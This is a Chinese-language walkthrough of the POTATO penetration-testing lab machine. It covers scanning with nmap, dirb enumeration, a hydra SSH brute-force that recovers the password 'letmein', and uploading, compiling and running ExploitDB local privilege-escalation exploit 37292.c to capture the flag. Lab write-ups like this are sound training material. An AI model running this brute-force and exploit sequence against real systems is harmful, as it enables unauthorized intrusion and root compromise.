0%

POTATO

渗透测试课程的靶机POTATO

渗透测试课程的一个靶机。

首先开启靶机,确认靶机设置网络适配器为NAT模式,打开虚拟网卡(可选)。

第一步还是靶机发现。

1
sudo arp-scan -l

扫描到靶机ip为192.168.80.159,然后照例用nmap扫描端口,发现80和7120端口开放。

注释截图

然后再检查这些端口的用处

1
2
3
4
5
6
7
8
9
10
11
nmap -p 80,7120 -sV 192.168.80.159
-p 参数:

语法:-p <port ranges>
作用:指定要扫描的端口范围。
示例:-p 80,7120 表示只扫描端口80和7120。
-sV 参数:

语法:-sV
作用:进行服务版本检测。nmap将尝试识别目标主机上运行的服务,并获取其版本信息。
示例:-sV 表示启用服务版本检测。

这里就看出思路的差别了,直接看WP做的话就去浏览器访问了,如果是自己做的话要先把各个端口的作用搞清楚。

注释截图

根据返回的结果得知80端口开放的服务是Http,7120端口开放的服务是SSH。

于是尝试用SSH连接

1
2
ssh root@192.168.80.159 -p 7120
-p:指定连接的端口号。

注释截图

发现可以连接,但是需要密码,那就先放一边去看Http服务。

访问看到一个土豆,注释中并没有什么值得注意的地方,于是联想到图片隐写。

注释截图

但是并没有线索,于是枚举网站目录。

1
dirb http://192.168.80.159

注释截图

发现三个页面,挨个访问:

index.php就是土豆图片的页面,sysinfo看到了版本信息,server-status访问不到。

注释截图

看到靶机所使用的ubuntu版本较低,于是考虑查找漏洞脚本。

先尝试爆破出靶机的用户和密码登陆进去。

利用的爆破工具是kali自带的hydra,字典是kali自带的rockyou.txt(位于/usr/share/wordlists)

爆破不出来root的密码,猜测用户名为potato。

1
hydra -l potato -P /usr/share/wordlists/rockyou.txt ssh://192.168.80.159:7120

得到密码为letmein

注释截图

然后查找可以利用的脚本。

1
2
3
4
searchsploit ubuntu 3.13.0
searchsploit 是 Kali Linux 中的一个用于搜索 Exploit Database(ExploitDB)的命令行工具。ExploitDB 是一个包含各种渗透测试和漏洞利用工具的开源数据库,旨在帮助安全专业人员查找已知的漏洞利用代码。

searchsploit 的作用是快速搜索本地 ExploitDB 数据库中与关键字相关的漏洞利用代码。它允许安全专业人员轻松查找有关特定漏洞的相关利用代码,以便用于渗透测试和漏洞利用的研究。

注释截图

然后要做的就是把这个脚本上传到靶机上。

1
2
3
4
5
6
7
8
sudo find /usr -name 37292.c
查找37292.c的位置
scp -P 7120 /usr/share/exploitdb/exploits/linux/local/37292.c potato@192.168.80.159:/tmp
把37292.c复制到靶机的tmp目录下
gcc 37292.c -o exp
把37292.c编译为可执行的文件
./exp
执行它

注释截图

得到flag为一串md5码。

1
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5b

在md5解密网站输入解密,得到flag为hoanguyen。

注释截图

结束。

-------------本文结束下次再见-------------

欢迎关注我的其它发布渠道